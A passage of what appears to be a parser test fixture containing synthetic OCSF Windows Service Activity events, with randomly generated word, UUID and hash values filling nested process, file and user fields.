\"version\": \"1.3.0\", \"path\": \"alice gnome diploma/consent.tex/groups.part\", \"product\": {\"name\": \"useful yen synopsis\", \"version\": \"1.3.0\", \"uid\": \"290d29f8-a0cf-11ef-a1a1-0242ac110007\", \"feature\": {\"name\": \"spider victor principle\", \"version\": \"1.3.0\", \"uid\": \"290d3420-a0cf-11ef-bd6a-0242ac110007\"}, \"url_string\": \"disagree\", \"vendor_name\": \"ist covered rock\"}, \"uid\": \"290d3b32-a0cf-11ef-bdef-0242ac110007\", \"ext\": \"glory regards somewhere\", \"type_id\": 3, \"company_name\": \"Melida Rosina\", \"parent_folder\": \"alice gnome diploma/consent.tex\", \"accessed_time\": 1731399707918, \"confidentiality\": \"Restricted\", \"confidentiality_id\": 6, \"hashes\": [{\"value\": \"A07C6F758C9EF024F836E2C0BD10FE9C43126081A22D73DD8040D8D179B10DEBE3BC9356500F5C7F0BA87256EFA37A673C190A0AC6F0BFC0529F9FC303878B00\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"security_descriptor\": \"isa action je\"}, \"user\": {\"name\": \"Messaging\", \"type\": \"System\", \"uid\": \"290d4c1c-a0cf-11ef-8059-0242ac110007\", \"type_id\": 3, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290d52b6-a0cf-11ef-9425-0242ac110007\", \"cmd_line\": \"rent seed gentleman\", \"created_time\": 1731399707918, \"lineage\": [\"pockets sponsor exactly\", \"disability syntax print\"], \"parent_process\": {\"name\": \"Corrections\", \"pid\": 10, \"file\": {\"name\": \"groove.xlsx\", \"owner\": {\"name\": \"February\", \"type\": \"User\", \"uid\": \"290d70de-a0cf-11ef-86d6-0242ac110007\", \"type_id\": 1, \"credential_uid\": \"290d775a-a0cf-11ef-afe6-0242ac110007\", \"email_addr\": \"Helena@songs.net\", \"risk_level\": \"High\", \"risk_level_id\": 3}, \"type\": \"Folder\", \"version\": \"1.3.0\", \"path\": \"announces contamination leisure/bits.kml/groove.xlsx\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290d9a32-a0cf-11ef-b46e-0242ac110007\", \"is_self_signed\": false, \"subject\": \"conferences kingdom charge\", \"issuer\": \"characterization relatively cas\", \"fingerprints\": [{\"value\": \"90F747EBF0E276407987570F6D39812AC53223E174E41CEDDD291A5F7136E3A6BEF9257C3C73FE3B92D5149E8E1C1BE08A61940CEB8AF03510E22E0492752C18\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"63C326C6244EB0474D3008256E1217754BD2B836E98C247D0A19A57BF2AB18C7FF3D6BF574DB7E31FED2EEC3DA9B7CB69EDDD8DC256FEB8D5E822F176D8444A9\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"created_time\": 1731399707920, \"expiration_time\": 1731399707920, \"serial_number\": \"seed stupid slide\"}, \"algorithm\": \"RSA\", \"algorithm_id\": 2, \"developer_uid\": \"290da806-a0cf-11ef-a0a5-0242ac110007\"}, \"ext\": \"retired penn graduated\", \"type_id\": 2, \"parent_folder\": \"announces contamination leisure/bits.kml\", \"hashes\": [{\"value\": \"2A7F70F5957828EEA5C62064B4EB2A32561EB5B3003D729F2605228F225A85EF528EF7666F79B2810432D7E39CB959670A2EA9B1EDEB258E107F47E68D114FEC\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707921}, \"user\": {\"name\": \"Diagram\", \"type\": \"System\", \"domain\": \"existing jun treasury\", \"uid\": \"290db904-a0cf-11ef-aa9a-0242ac110007\", \"org\": {\"name\": \"coding maria scenarios\", \"uid\": \"290dc340-a0cf-11ef-9323-0242ac110007\"}, \"type_id\": 3, \"risk_score\": 79}, \"uid\": \"290dca20-a0cf-11ef-b98e-0242ac110007\", \"cmd_line\": \"mechanical estimates again\", \"created_time\": 1731399707921, \"parent_process\": {\"name\": \"Tabs\", \"pid\": 55, \"session\": {\"uid\": \"290deae6-a0cf-11ef-b636-0242ac110007\", \"issuer\": \"rat employer stadium\", \"created_time\": 1731399707922, \"credential_uid\": \"290df4e6-a0cf-11ef-9290-0242ac110007\", \"expiration_time\": 1731399707922, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"name\": \"integral.cpl\", \"owner\": {\"type\": \"sphere\", \"domain\": \"entirely gale inc\", \"type_id\": 99, \"account\": {\"name\": \"suits kim intellectual\", \"type\": \"AWS IAM User\", \"uid\": \"290e0f3a-a0cf-11ef-92a9-0242ac110007\", \"type_id\": 3}, \"risk_level\": \"carpet diamond departure\", \"uid_alt\": \"meta spank counts\"}, \"size\": 3671310304, \"type\": \"Symbolic Link\", \"path\": \"normal holds match/terrible.iso/integral.cpl\", \"modifier\": {\"name\": \"Acids\", \"type\": \"typing\", \"type_id\": 99}, \"uid\": \"290e1bec-a0cf-11ef-a719-0242ac110007\", \"ext\": \"stated smooth principles\", \"type_id\": 7, \"company_name\": \"Jeremiah Sonny\", \"parent_folder\": \"normal holds match/terrible.iso\", \"hashes\": [{\"value\": \"C449C98FCC2EDC7FE87FAF3FEF6C9D3F5499ACDC3BAC774F19D7B447B333103DCFED31CCAC83F9EE9D1E9601282E92EDA75DAEA8140D8C7EB9220338803C8D6E\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}]}, \"user\": {\"name\": \"Reduce\", \"type\": \"Admin\", \"domain\": \"preceding expressions your\", \"uid\": \"290e30c8-a0cf-11ef-8f59-0242ac110007\", \"groups\": [{\"name\": \"struggle photoshop walking\", \"desc\": \"sleep quoted able\", \"uid\": \"290e3b2c-a0cf-11ef-b7cf-0242ac110007\"}, {\"name\": \"ethiopia evaluate lover\", \"desc\": \"partition sound composition\"}], \"type_id\": 2, \"full_name\": \"Marisha Wesley\", \"ldap_person\": {\"cost_center\": \"spank universal techniques\", \"deleted_time\": 1731399707924, \"ldap_cn\": \"sight tale town\", \"leave_time\": 1731399707924, \"modified_time\": 1731399707924}}, \"uid\": \"290e4748-a0cf-11ef-8355-0242ac110007\", \"cmd_line\": \"flower arrest reveal\", \"created_time\": 1731399707925, \"parent_process\": {\"name\": \"Dip\", \"pid\": 99, \"session\": {\"uid\": \"290e5cb0-a0cf-11ef-8142-0242ac110007\", \"uuid\": \"290e63f4-a0cf-11ef-942e-0242ac110007\", \"issuer\": \"spirits up oral\", \"expiration_time\": 1731399707925, \"is_mfa\": false, \"is_remote\": true}, \"file\": {\"name\": \"fantasy.m4v\", \"owner\": {\"name\": \"Worse\", \"type\": \"User\", \"uid\": \"290e7628-a0cf-11ef-8429-0242ac110007\", \"groups\": [{\"name\": \"pierce deutschland scout\", \"type\": \"sacred mongolia edt\", \"uid\": \"290e8712-a0cf-11ef-b60b-0242ac110007\"}], \"type_id\": 1, \"full_name\": \"Tomika Renato\"}, \"type\": \"Regular File\", \"path\": \"approaches malpractice basics/lifetime.dxf/fantasy.m4v\", \"desc\": \"loops charm mpegs\", \"ext\": \"pork picked investigations\", \"type_id\": 1, \"parent_folder\": \"approaches malpractice basics/lifetime.dxf\", \"accessed_time\": 1731399707926, \"confidentiality\": \"subjective\", \"confidentiality_id\": 99, \"hashes\": [{\"value\": \"DB1A6CE0E4C6F3924C7CCA74924F4B0EF8BC0031\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"2B9A99087B9991B5EAD9406E2CAC8DA385815E6C3FA4DA96E1487782280E8E82FDBD3536F85994E271610D72C5A62E6F027E0CD37DA05806289882A1440BD441\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"xattributes\": {}}, \"user\": {\"name\": \"Expects\", \"type\": \"System\", \"domain\": \"blade keith manga\", \"uid\": \"290e9ba8-a0cf-11ef-9a18-0242ac110007\", \"type_id\": 3, \"account\": {\"name\": \"swedish ol flexible\", \"type\": \"GCP Account\", \"uid\": \"290ea6ca-a0cf-11ef-9b3b-0242ac110007\", \"type_id\": 5}, \"risk_level\": \"world feelings championships\"}, \"uid\": \"290eadbe-a0cf-11ef-9668-0242ac110007\", \"cmd_line\": \"iowa gear scheduling\", \"created_time\": 1731399707927, \"integrity\": \"Medium\", \"integrity_id\": 3, \"lineage\": [\"maximize associations reynolds\"], \"parent_process\": {\"name\": \"Themes\", \"pid\": 45, \"file\": {\"name\": \"designers.rpm\", \"type\": \"Named Pipe\", \"path\": \"votes year mice/fort.gpx/designers.rpm\", \"uid\": \"290edaaa-a0cf-11ef-aa5d-0242ac110007\", \"ext\": \"keyboards yet ask\", \"type_id\": 6, \"mime_type\": \"motorola/patrick\", \"parent_folder\": \"votes year mice/fort.gpx\", \"created_time\": 1731399707928, \"hashes\": [{\"value\": \"02FA8D46FB2AC65EE42912604250A146AF74C6B8CFF1ACD09BC5F460FB9850CAD2674F76F982ED052C78D178196ED4C10256E2BC50E191DBB82F625CAD071090\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"BA1DB3B5141AA0FBF3DD4F6839F49B0B88809121634B4BB39272A838924DDEA2E4D1EBDB9E5F8F8AD90243DBD2A7D2D5497D828BD12E5590FB27483AA1287CD3\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707928}, \"user\": {\"name\": \"Ongoing\", \"uid\": \"290ee9a0-a0cf-11ef-ac76-0242ac110007\", \"credential_uid\": \"290ef076-a0cf-11ef-adb8-0242ac110007\"}, \"tid\": 6, \"uid\": \"290ef99a-a0cf-11ef-a3ec-0242ac110007\", \"cmd_line\": \"correction weapon gaming\", \"created_time\": 1731399707929, \"parent_process\": {\"name\": \"Voyeurweb\", \"pid\": 45, \"file\": {\"name\": \"varied.php\", \"type\": \"Named Pipe\", \"path\": \"mba francis sony/tend.xml/varied.php\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": true, \"subject\": \"undo nickname stay\", \"issuer\": \"yugoslavia how precisely\", \"fingerprints\": [{\"value\": \"BD87A5FFC4117A0F11094CA6BA6A838013BE215959B7358980553B0360822DD67CACADAFA42D71AB48C4EA3EED5F2491D079661CEB0A7694FFA439EB7743CC04\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"4194D1706ED1F408D5E02D672777019F4D5385C766A8C6CA8ACBA3167D36A7B9\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"created_time\": 1731399707930, \"expiration_time\": 1731399707930, \"serial_number\": \"extraction cabin lions\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707930}, \"ext\": \"nicholas doing fraud\", \"type_id\": 6, \"mime_type\": \"nextel/himself\", \"parent_folder\": \"mba francis sony/tend.xml\", \"hashes\": [{\"value\": \"21EA6263C16406DFC344CF7CB2A129B97FD2ECF367C828208CBBEDA6599B989F6C2C3DCB1BDF581ABC97201CF64FFBC0D7415F00564F6D80A92C7FFE7037894C\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"7ED6BDBCCADC1CB9DFEA88CA33B6A9346EAE030FF7E9FADD4C23359C0EA7390D\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"security_descriptor\": \"islands interventions removable\", \"xattributes\": {}}, \"user\": {\"name\": \"Soldier\", \"type\": \"User\", \"uid\": \"290f2596-a0cf-11ef-8caf-0242ac110007\", \"type_id\": 1, \"account\": {\"name\": \"ford doug cigarette\", \"type\": \"Mac OS Account\", \"uid\": \"290f3090-a0cf-11ef-9ad3-0242ac110007\", \"type_id\": 7}}, \"uid\": \"290f36e4-a0cf-11ef-bdab-0242ac110007\", \"cmd_line\": \"generally alberta anthropology\", \"created_time\": 1731399707931, \"parent_process\": {\"name\": \"Spirits\", \"pid\": 86, \"file\": {\"name\": \"flights.flv\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"str inner working/pose.h/flights.flv\", \"ext\": \"general became bermuda\", \"type_id\": 1, \"parent_folder\": \"str inner working/pose.h\", \"hashes\": [{\"value\": \"DC684E0A948E820C9B32AE34F0E147CCCAEAB3646C95D1FBF6E5EA257B9107251945EB892CD81A3750D89799ADF86C76382C60E73A85B10D110CE39164882C8F\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}, {\"value\": \"CCD823CAF8108F62C012B02D4C233DA76EACF9FDEA959B9DD909ADF1ECC01BD5F184FC7904184E5A6F296850D7102AAF79E8606629B877723DEC951A67E1B193\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731399707932}, \"uid\": \"290f6ac4-a0cf-11ef-bc5e-0242ac110007\", \"cmd_line\": \"sense terrorism hl\", \"created_time\": 1731399707932, \"parent_process\": {\"name\": \"Moving\", \"pid\": 43, \"file\": {\"attributes\": 25, \"name\": \"comparison.pages\", \"owner\": {\"name\": \"Infringement\", \"type\": \"User\", \"uid\": \"290f864e-a0cf-11ef-9828-0242ac110007\", \"groups\": [{\"name\": \"coordinate registration browse\", \"desc\": \"attorney ya walked\", \"uid\": \"290f974c-a0cf-11ef-a918-0242ac110007\"}], \"type_id\": 1, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 55, \"uid_alt\": \"licenses cir vacancies\"}, \"type\": \"Unknown\", \"path\": \"lows fc focusing/canvas.pptx/comparison.pages\", \"modifier\": {\"type\": \"User\", \"uid\": \"290fa3ea-a0cf-11ef-b1b2-0242ac110007\", \"groups\": [{\"name\": \"bedroom positions win\", \"desc\": \"amazon feof extras\", \"uid\": \"290fae44-a0cf-11ef-9db8-0242ac110007\"}, {\"name\": \"came swingers colon\", \"uid\": \"290fb646-a0cf-11ef-b3ed-0242ac110007\"}], \"type_id\": 1, \"ldap_person\": {\"employee_uid\": \"290fc050-a0cf-11ef-aac9-0242ac110007\", \"job_title\": \"constitutional ricky jonathan\", \"ldap_dn\": \"marketplace ranch counting\"}, \"risk_score\": 0, \"uid_alt\": \"riding indicate wiley\"}, \"ext\": \"specification cialis inherited\", \"type_id\": 0, \"parent_folder\": \"lows fc focusing/canvas.pptx\", \"confidentiality\": \"engineers families bull\", \"hashes\": [{\"value\": \"F081F7B8D4310E67A7572F60B6070A3034D5F1AE1465B3FE4F8DAFCA9213A0E3\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"EAF741D48E0F26CA709BF17829C53A65D420FBD1F01B0F87BDE25230F1FF332E3D2BE89488F8277FA4B22FF53CC04FF382B19F42B7AC34C3EA5A0C0A89B19FCA\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Worn\", \"type\": \"Admin\", \"domain\": \"threatening parks application\", \"uid\": \"290fd5fe-a0cf-11ef-ab0d-0242ac110007\", \"type_id\": 2, \"risk_level\": \"High\", \"risk_level_id\": 3}, \"uid\": \"290fde14-a0cf-11ef-9211-0242ac110007\", \"loaded_modules\": [\"/yacht/payday/singer/stretch/hungry.heic\", \"/fa/bumper/represents/studio/shipments.ttf\"], \"cmd_line\": \"shopping appendix deluxe\", \"created_time\": 1731399707935, \"terminated_time\": 1731399707935}, \"xattributes\": {}}, \"xattributes\": {}}, \"terminated_time\": 1731399707935}}, \"terminated_time\": 1731399707935}}}, \"terminated_time\": 1731399707935}, \"sandbox\": \"snowboard lookup done\"}}}}, \"sandbox\": \"broke alternatives excessive\", \"xattributes\": {}}, \"sandbox\": \"mba ambassador shopping\"}}, \"terminated_time\": 1731399707935}}, \"user\": {\"name\": \"Hearing\", \"type\": \"Admin\", \"domain\": \"thinking answered refurbished\", \"uid\": \"290fefee-a0cf-11ef-ba87-0242ac110007\", \"type_id\": 2, \"ldap_person\": {\"email_addrs\": [\"Melodee@automotive.mobi\", \"Lulu@baby.name\"], \"employee_uid\": \"290ffac0-a0cf-11ef-a362-0242ac110007\", \"leave_time\": 1731399707936, \"office_location\": \"podcast cds lloyd\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1, \"risk_score\": 22}}, \"severity_id\": 3, \"status_code\": \"present\", \"status_detail\": \"shade accidents alice\", \"status_id\": 2, \"win_service\": {\"name\": \"balance pgp seasonal\", \"version\": \"1.3.0\", \"uid\": \"29101582-a0cf-11ef-a560-0242ac110007\", \"cmd_line\": \"honduras usa fact\", \"service_dependencies\": [\"enhancements occupations cause\", \"sw verification promotion\"], \"service_start_type\": \"Auto\", \"service_start_type_id\": 3, \"service_start_name\": \"golden thumbs crest\"}}" + }, + "expected": { + "message": "{\"message\": \"gear technologies garlic\", \"status\": \"Failure\", \"time\": 1731399707936, \"device\": {\"owner\": {\"name\": \"Paper\", \"type\": \"Unknown\", \"domain\": \"comfort pick casino\", \"uid\": \"29093ba4-a0cf-11ef-a993-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"2909420c-a0cf-11ef-ae57-0242ac110007\"}, \"type\": \"IDS\", \"uid\": \"29092d44-a0cf-11ef-8baa-0242ac110007\", \"type_id\": 13, \"imei\": \"polyester verified charlie\", \"instance_uid\": \"29091d04-a0cf-11ef-8935-0242ac110007\", \"interface_name\": \"fonts roller schema\", \"interface_uid\": \"290925c4-a0cf-11ef-83a0-0242ac110007\", \"is_managed\": true, \"network_interfaces\": [{\"name\": \"nickname museums symptoms\", \"type\": \"Unknown\", \"hostname\": \"influenced.museum\", \"mac\": \"25:15:EA:C3:5F:12:EF:E9\", \"type_id\": 0}, {\"name\": \"polar bm traveler\", \"type\": \"Wired\", \"hostname\": \"vegetarian.store\", \"mac\": \"87:8C:2:BD:DD:A8:43:3A\", \"type_id\": 1}], \"region\": \"provider nirvana absolute\", \"risk_level\": \"Critical\", \"risk_level_id\": 4}, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"pokemon know retrieval\", \"version\": \"1.3.0\", \"path\": \"dolls vid representing\", \"uid\": \"290890b4-a0cf-11ef-b8db-0242ac110007\", \"vendor_name\": \"hide broken trademark\"}, \"profiles\": [], \"log_name\": \"cindy drives thin\", \"log_provider\": \"foo canada biodiversity\", \"original_time\": \"virus pure partly\", \"processed_time\": 1731399707888}, \"start_time\": 1731399707936, \"severity\": \"Medium\", \"category_uid\": 1, \"activity_id\": 4, \"type_uid\": 20100404, \"type_name\": \"Windows Service Activity: Stop\", \"observables\": [{\"name\": \"generation damages hawaii\", \"type\": \"Email\", \"value\": \"sale talking pairs\", \"type_id\": 22}, {\"name\": \"testimonials seventh smallest\", \"type\": \"MAC Address\", \"type_id\": 3}], \"category_name\": \"System Activity\", \"class_uid\": 201004, \"class_name\": \"Windows Service Activity\", \"timezone_offset\": 72, \"activity_name\": \"Stop\", \"actor\": {\"process\": {\"name\": \"Don\", \"pid\": 38, \"file\": {\"name\": \"developmental.otf\", \"type\": \"Regular File\", \"path\": \"vg tunisia river/favorite.wsf/developmental.otf\", \"ext\": \"mike biography serial\", \"type_id\": 1, \"accessor\": {\"name\": \"Mathematical\", \"type\": \"Unknown\", \"domain\": \"touring wing sunglasses\", \"org\": {\"name\": \"battery met word\", \"uid\": \"29099612-a0cf-11ef-9f88-0242ac110007\", \"ou_name\": \"invitation olympus putting\"}, \"type_id\": 0, \"credential_uid\": \"29099f68-a0cf-11ef-ab1c-0242ac110007\", \"risk_level\": \"constitution missions steam\"}, \"parent_folder\": \"vg tunisia river/favorite.wsf\", \"confidentiality\": \"Top Secret\", \"confidentiality_id\": 4, \"hashes\": [{\"value\": \"9280AE13A255F18D841739D0D18222BB950C8FC7\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"security_descriptor\": \"gibson columbia refund\"}, \"user\": {\"name\": \"Journal\", \"type\": \"System\", \"domain\": \"tuition gst cheese\", \"uid\": \"2909b99e-a0cf-11ef-946c-0242ac110007\", \"groups\": [{\"name\": \"overview friendly ul\", \"desc\": \"spent richards molecular\", \"privileges\": [\"gale suicide combo\"]}], \"type_id\": 3, \"full_name\": \"Lynsey Sherise\"}, \"uid\": \"2909c8d0-a0cf-11ef-82af-0242ac110007\", \"cmd_line\": \"hdtv il murder\", \"created_time\": 1731399707895, \"parent_process\": {\"name\": \"Indoor\", \"pid\": 29, \"session\": {\"terminal\": \"eternal armor maternity\", \"uid\": \"290a04bc-a0cf-11ef-9799-0242ac110007\", \"uuid\": \"290a0af2-a0cf-11ef-8713-0242ac110007\", \"issuer\": \"troubleshooting footage pour\", \"created_time\": 1731399707897}, \"file\": {\"attributes\": 81, \"name\": \"submitted.cpp\", \"owner\": {\"name\": \"Reverse\", \"type\": \"Unknown\", \"domain\": \"wiki ba evaluating\", \"uid\": \"290a2bea-a0cf-11ef-a2af-0242ac110007\", \"type_id\": 0, \"email_addr\": \"Bessie@outcomes.pro\", \"risk_level\": \"plenty sarah preparation\"}, \"size\": 2618568753, \"type\": \"Local Socket\", \"version\": \"1.3.0\", \"path\": \"annually chapters country/separately.pdf/submitted.cpp\", \"modifier\": {\"name\": \"Appraisal\", \"type\": \"Admin\", \"uid\": \"290a3a2c-a0cf-11ef-96ea-0242ac110007\", \"type_id\": 2}, \"desc\": \"deeply dresses hills\", \"ext\": \"scholarships fundraising hydrocodone\", \"type_id\": 5, \"company_name\": \"Galen Nakita\", \"parent_folder\": \"annually chapters country/separately.pdf\", \"accessed_time\": 1731399707898, \"hashes\": [{\"value\": \"9E2FB759708B9621D802CC03D5DA0C1600A80AE7A740A0840F232C31B6E61F01EE5CF00A1719E67BEC538182D8A3074DA5123670601506065A44D4E8AC2C4CB2\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"xattributes\": {}}, \"user\": {\"name\": \"Asian\", \"type\": \"Unknown\", \"uid\": \"290a520a-a0cf-11ef-a44f-0242ac110007\", \"type_id\": 0, \"full_name\": \"Roland Nichol\", \"account\": {\"name\": \"girl sugar benefit\", \"type\": \"Azure AD Account\", \"uid\": \"290a5ef8-a0cf-11ef-809f-0242ac110007\", \"labels\": [\"complex\"], \"type_id\": 6}, \"credential_uid\": \"290a66e6-a0cf-11ef-a28e-0242ac110007\", \"uid_alt\": \"transportation vegetables debian\"}, \"uid\": \"290a756e-a0cf-11ef-86a9-0242ac110007\", \"cmd_line\": \"bull retailers sensitivity\", \"created_time\": 1731399707900, \"lineage\": [\"george herein ghz\"], \"parent_process\": {\"name\": \"Broader\", \"pid\": 50, \"file\": {\"name\": \"vegetation.tif\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"leonard accent told/determine.sdf/vegetation.tif\", \"signature\": {\"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"traffic changes calm\", \"issuer\": \"give img nsw\", \"fingerprints\": [{\"value\": \"7245C357B5BE2E81CFA6582A9CEF4108E8E9BC9E4DA47D108C495262F1EE943BB741CFFE5FDDEE5B3AD441498918E714FF20108B4CDDEDE100B8AD003E7DDA73\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"created_time\": 1731399707900, \"serial_number\": \"blades mike seal\"}, \"algorithm\": \"Authenticode\", \"algorithm_id\": 4}, \"desc\": \"electronics charges gallery\", \"ext\": \"disorder agriculture anger\", \"type_id\": 1, \"company_name\": \"Billie Shawnee\", \"mime_type\": \"briefly/entirely\", \"parent_folder\": \"leonard accent told/determine.sdf\", \"created_time\": 1731399707900, \"hashes\": [{\"value\": \"0947FCC917EB1D3C89AD818BEB61E3B2C3CF3BBA\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"CEE604715F44D7CD732D46B9B349EC7911E55D19C6E598E8064B403337EB8F9EA9E58A34D42BA046D72E529215E7D8E2AB68DA5552324343DA54BF3220615F0A\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"modified_time\": 1731399707900}, \"user\": {\"name\": \"Markers\", \"type\": \"Unknown\", \"uid\": \"290a9f62-a0cf-11ef-b0c9-0242ac110007\", \"groups\": [{\"name\": \"foul administrative owns\", \"uid\": \"290aaa98-a0cf-11ef-a3a1-0242ac110007\"}, {\"name\": \"develop houston gamma\", \"uid\": \"290ab498-a0cf-11ef-80bd-0242ac110007\", \"privileges\": [\"shade bell link\", \"processor code ashley\"]}], \"type_id\": 0, \"account\": {\"type\": \"AWS Account\", \"uid\": \"290abf42-a0cf-11ef-a831-0242ac110007\", \"type_id\": 10}}, \"uid\": \"290ac5dc-a0cf-11ef-a78c-0242ac110007\", \"cmd_line\": \"studies un checking\", \"created_time\": 1731399707902, \"integrity\": \"Unknown\", \"integrity_id\": 0, \"lineage\": [\"commodity config charges\", \"wikipedia las relatives\"], \"parent_process\": {\"name\": \"Eyed\", \"pid\": 59, \"user\": {\"name\": \"Louisiana\", \"type\": \"System\", \"uid\": \"290b1514-a0cf-11ef-9bd3-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"290b1cbc-a0cf-11ef-8f91-0242ac110007\", \"risk_level\": \"Info\", \"risk_level_id\": 0}, \"uid\": \"290b241e-a0cf-11ef-89bc-0242ac110007\", \"cmd_line\": \"skins shipments proteins\", \"created_time\": 1731399707904, \"parent_process\": {\"name\": \"Almost\", \"pid\": 53, \"user\": {\"name\": \"Subscription\", \"type\": \"User\", \"domain\": \"lion aims yukon\", \"uid\": \"290b388c-a0cf-11ef-81e2-0242ac110007\", \"type_id\": 1}, \"uid\": \"290b3f44-a0cf-11ef-856f-0242ac110007\", \"cmd_line\": \"bidding lauren confusion\", \"created_time\": 1731399707905, \"parent_process\": {\"name\": \"Word\", \"pid\": 11, \"session\": {\"count\": 9, \"issuer\": \"practice attempt court\", \"created_time\": 1731399707905, \"is_remote\": true, \"is_vpn\": true}, \"file\": {\"attributes\": 44, \"name\": \"consistency.sln\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"handbags camera urgent/forecast.gz/consistency.sln\", \"ext\": \"entity fe blocking\", \"type_id\": 3, \"parent_folder\": \"handbags camera urgent/forecast.gz\", \"hashes\": [{\"value\": \"6D17DA8FAF5A7C8BD04AFB00506B03897D0DE6A8D7B4EBD644B680ACB98A1CFE8924C0F11BCCA03BFC8D47BE350C1C8A20AF62D4E02D978CB8159FB2D49086A7\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"BE412112026B3DCAEC7BE421BA9D884A2FBC5C9795F336CCBD0E8C76BFF312AA3BAFBB4BA71F540A076F5C0D8189254B397357A086D5B86B7D794FDCE6FCCFC1\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}], \"is_system\": true}, \"user\": {\"type\": \"Unknown\", \"uid\": \"290b69f6-a0cf-11ef-a847-0242ac110007\", \"type_id\": 0}, \"uid\": \"290b720c-a0cf-11ef-a98d-0242ac110007\", \"cmd_line\": \"fears demanding stewart\", \"created_time\": 1731399707906, \"integrity\": \"High\", \"integrity_id\": 4, \"parent_process\": {\"name\": \"Kinds\", \"pid\": 63, \"session\": {\"uid\": \"290b83d2-a0cf-11ef-9629-0242ac110007\", \"uuid\": \"290b89cc-a0cf-11ef-89ef-0242ac110007\", \"issuer\": \"tray lying x\", \"created_time\": 1731399707907, \"is_remote\": true}, \"file\": {\"name\": \"concerns.cab\", \"type\": \"Character Device\", \"version\": \"1.3.0\", \"path\": \"faq payable progressive/part.m3u/concerns.cab\", \"ext\": \"imported supplements prepaid\", \"type_id\": 3, \"mime_type\": \"garmin/popularity\", \"parent_folder\": \"faq payable progressive/part.m3u\", \"hashes\": [{\"value\": \"E8A5CF21ECCC4DB4DAAFDD5BD0140861637D937597AD8EE0246E0715031FE6BDABB4F5B16FDDCACD9722B57A18B46453B01D984E3D55292FB82825C3A06E516A\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}, {\"value\": \"4B9E4636494461CF31094E9A16F456FE\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}]}, \"user\": {\"type\": \"remarkable\", \"type_id\": 99, \"full_name\": \"Jennell Sidney\", \"email_addr\": \"Clayton@scanned.travel\", \"ldap_person\": {\"location\": {\"desc\": \"Monaco, Principality of\", \"city\": \"Phil clarity\", \"country\": \"MC\", \"coordinates\": [113.7672, 53.7852], \"continent\": \"Europe\"}, \"given_name\": \"rachel trio electronics\", \"ldap_cn\": \"accessory fancy shelter\"}}, \"uid\": \"290babfa-a0cf-11ef-a1ee-0242ac110007\", \"cmd_line\": \"tuner clara concepts\", \"created_time\": 1731399707908, \"integrity\": \"boxes x day\", \"parent_process\": {\"name\": \"Animated\", \"pid\": 43, \"file\": {\"name\": \"pgp.rom\", \"type\": \"Symbolic Link\", \"path\": \"percent obtaining influenced/liked.bmp/pgp.rom\", \"signature\": {\"digest\": {\"value\": \"0A6CFE12D4BE13BD525E0097949ED52B4E032606B7BF98076581F2189F23342568BE12B631EF1F25F82E1979FC852ECA24E8A38B319B071638C3153E4DA60740\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, \"certificate\": {\"version\": \"1.3.0\", \"uid\": \"290bcd06-a0cf-11ef-8f86-0242ac110007\", \"is_self_signed\": true, \"subject\": \"brilliant follow county\", \"issuer\": \"suppliers workout deposit\", \"fingerprints\": [{\"value\": \"03114C6B1064C1C04AE3C88FA18F582A2228B88A7786BBFCBCE275DED7A5C23A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}, {\"value\": \"F07D26D3B025D5EF30B38458926092E990C3B6F0BE1A23B561D778E8467319E0444B2425FDEDB91121554B8641B06B3654426F63C9C0435C6487571DC9AE0FC5\", \"algorithm\": \"SHA-512\", \"algorithm_id\": 4}], \"created_time\": 1731399707908, \"expiration_time\": 1731399707909, \"serial_number\": \"hazard compaq emirates\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0, \"created_time\": 1731399707909}, \"type_id\": 7, \"accessor\": {\"name\": \"Athletes\", \"type\": \"System\", \"uid\": \"290bdfe4-a0cf-11ef-88a6-0242ac110007\", \"org\": {\"name\": \"publicity porsche shoulder\", \"uid\": \"290bebf6-a0cf-11ef-bcbf-0242ac110007\", \"ou_name\": \"wins separate 